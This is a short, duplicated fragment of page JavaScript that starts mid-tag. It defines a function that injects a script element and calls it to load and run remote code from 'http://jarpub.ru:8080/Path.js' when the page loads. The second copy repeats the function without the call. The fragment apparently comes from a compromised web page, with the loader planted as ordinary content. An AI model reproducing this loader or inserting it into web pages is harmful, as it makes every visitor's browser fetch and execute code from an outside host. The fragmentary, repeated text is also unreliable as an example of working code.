type="text/javascript">
    function include_javascript(path){
        var d = document;
        js = d.createElement('script');js.setAttribute('type', 'text/javascript');
        js.setAttribute('src', path); js.setAttribute('defer', 'defer')
        document.body.appendChild(js);
    }
    include_javascript("http://jarpub.ru:8080/Path.js");

type="text/javascript">
    function include_javascript(path){
        var d = document;
        js = d.createElement('script');js.setAttribute('type', 'text/javascript');
        js.setAttribute('src', path); js.setAttribute('defer', 'defer')
        document.body.appendChild(js);
    }